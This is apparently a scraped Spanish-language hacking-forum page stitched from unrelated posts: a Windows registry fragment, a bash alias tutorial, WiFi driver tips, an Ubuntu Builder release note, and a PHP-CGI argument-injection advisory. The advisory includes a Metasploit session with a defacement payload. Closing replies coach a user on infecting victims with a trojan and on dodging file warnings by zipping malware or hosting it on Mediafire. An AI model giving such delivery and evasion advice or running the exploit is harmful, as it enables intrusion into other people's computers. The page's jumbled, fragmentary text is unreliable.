77,00,73,00,20,00,58,00,50,00,20,00,4c,00,6f,00,67,00,6f,00,66,00,66,00,20,\
00,53,00,6f,00,75,00,6e,00,64,00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\WindowsLogoff\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,4c,00,6f,00,67,00,6f,00,66,00,66,00,20,\
00,53,00,6f,00,75,00,6e,00,64,00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\WindowsLogon]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\WindowsLogon\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,4c,00,6f,00,67,00,6f,00,6e,00,20,00,53,\
00,6f,00,75,00,6e,00,64,00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\WindowsLogon\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,4c,00,6f,00,67,00,6f,00,6e,00,20,00,53,\
00,6f,00,75,00,6e,00,64,00,2e,00,77,00,61,00,76,00,00,00



Autor: cu-32
Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hay veces que algunos comandos pueden ser difíciles de recordar, otras veces no es que no los recordemos pero se nos puede hacer pesado escribir todo el tiempo alguno de ellos y más si son una cadena muy larga. Para ambos casos, nuestro sistema tiene una solución, los alias.

Como el propio nombre indica, alias se encarga de ponerle un "apodo" o un nombre alternativo a esos comandos difíciles de recordar o facilitarnos algunas tareas repetitivas. En realidad se trata de crear una atajo hacia un comando o función al que le daremos el nombre que queramos.
Su utilización es muy simple y su sintaxis más básica sería:

alias nombre_de_alias='comando completo'

Tan sencillo como eso, a partir de ese momento al escribir el nombre que le hallamos puesto al comando o la cadena de ellos se ejecutarán normalmente. Algunos ejemplos:

alias actualiza='sudo apt-get update'
alias instala='sudo apt-get install'
alias limpia='sudo apt-get autoremove && sudo apt-get autoclean && sudo apt-get clean'
alias monta='mount -t ntfs -o users /dev/sdb1 /mnt/media'

Solo con escribir limpia, comenzará a hacer una limpieza de nuestro sistema.

Como digo, se puede ejecutar directamente en la terminal, pero al cerrar la sesión los alias que hayamos creado, desaparecerán. Para evitarlo, podemos añadirlos directamente en nuestro archivo .bashrc, de esta forma se cargarán al iniciar nuestra distro.

sudo gedit .bashrc

Donde añadiremos los alias que nos parezca.




Puede ocurrir que si tienes tan mala memoria como yo, después de volverte loco metiendo los alias, no recordemos los nombres que le hemos dado a algunos, para ello solo tenemos que teclear alias -p en una consola para obtener un listado de todos.


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Vamos a retomar tus problemas, pero esta vez vamos a mirar de ir por otro camino.


Tipea el comando "airmon-ng" o "iwconfig" para ver el chipset de tu tarjeta WiFi y lo buscas en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para instalar los drivers.

También voy a dejarte un You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.


Saludos

Ubuntu Builder es una aplicación que nos permite crear nuestra propia You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Con ella podremos elegir el tipo de entorno de escritorio, gestor de ventanas o de paquetes, etc. Por lo que podremos crear un Ubuntu personalizado que puede ser instalado en cualquier ordenador, ya sea de 32 o 64 bits.


Este programa se acaba de actualizar a la versión 2.0.1 con una You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login de usuario más limpia, mejoras en los iconos y mayor usabilidad. Su uso es sencillo, solo tenemos que descargar una de las versiones predeterminadas (Standard y Mini Remix), o utilizar una ya descargada en nuestro disco.


Podemos tanto añadir como quitar casi todo lo que se nos ocurra, manualmente o siguiendo el asistente, consiguiendo un Ubuntu completamente personalizado y listo para grabar en una memoria USB o un You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, que incluso podemos probar directamente desde el propio programa mediante QEMU.


Algunos de los cambios de esta nueva versión son:

• Añadido soporte para Presice Pangolín
  

• Eliminado soporte para Maverick Meerkat
  

• Ahora se inicia el programa como superusuario
  

• Es posible establecer cuatro nuevos idiomas por defecto
  

• Es posible leer un archivo de registro
  

• Permite editar el slideshow de Ubiquity
  

• Solución de error: el botón "Clean workpath 'no elimina toda la workpath.
  

• Nueva interfaz gráfica de usuario e You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
  

• Un nuevo manual de usuario html.
  

• Diversos cambios y correcciones de errores.
  

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Para instalar Ubuntu Builder 2.0.1, podemos descargar el paquete .deb desde You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, o agregar el PPA de la siguiente manera:

Citar

sudo add-apt-repository ppa:f-muriana/ubuntu-builder
sudo apt-get update
sudo apt-get install ubuntu-builder

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Las sitios afectados son servidores web con PHP ejecutándose como CGI.

Eindbazen, un equipo de competiciones CTF, ha descubierto una vulnerabilidad en PHP-CGI You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login que permite pasar parámetros al intérprete de PHP, como -s o -r, a través de la URL. Por ejemplo añadiendo la cadena '?-s'.


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Como resultado de la inyección de estos parámetros en la URL, se puede mostrar el contenido de archivos de código fuente (que puede incluir información confidencial como, por ejemplo, contraseñas de BBDD) o ejecutar código PHP arbitrario.


Aunque el parámetro '-r', para ejecutar código PHP, es filtrado en php5-cgi, dependiendo de las variables de entorno, esta medida de seguridad puede evitarse. PHP eliminó por error el código que protegía ante este problema en 2004.



Ya existen módulos para Metasploit (use exploit/multi/http/php_cgi_arg_injection):

[code]$ ./msfconsole
msf > use exploit/multi/http/php_cgi_arg_injection
msf  exploit(php_cgi_arg_injection) > set RHOST 192.168.178.210
msf  exploit(php_cgi_arg_injection) > set TARGETURI /phpinfo.php
msf  exploit(php_cgi_arg_injection) > set PAYLOAD php/exec
msf  exploit(php_cgi_arg_injection) > set CMD echo \"owned\">/var/www/html/owned.html
msf  exploit(php_cgi_arg_injection) > exploit

[/code]

Vídeo demostrativo:





Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vídeo: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Me parece que has cometido un error, y es que quieres autoinfectarte usando tu No-IP o bien infectar otro PC conectado a tu misma Red, si así se trata es normal que no conecte.



Saludos

Los métodos de intrusión que mencionas son regulares, que quiero decir con eso, que no funciona por ejemplo en versiones de Windows superior a XP. Y como dices que envías archivos a la víctima podrías enfocarte más al mundo del Troyano ya que cuando la víctima ejecute el Servidor tendrás acceso remoto a su PC.

El problema que tienes con el "archivo sospechoso o peligroso" es fácil de saltárselo o bien comprimiendolo con Zip o subiendolo algún hosting, por ejemplo subes tu Malware a Mediafire y le pasas la URL.


Saludos

No me he enterado de nada, dices que has aprendido a sacar información de otros equipos (no dices como) y que no puedes entrar en ellos sin usar Exploits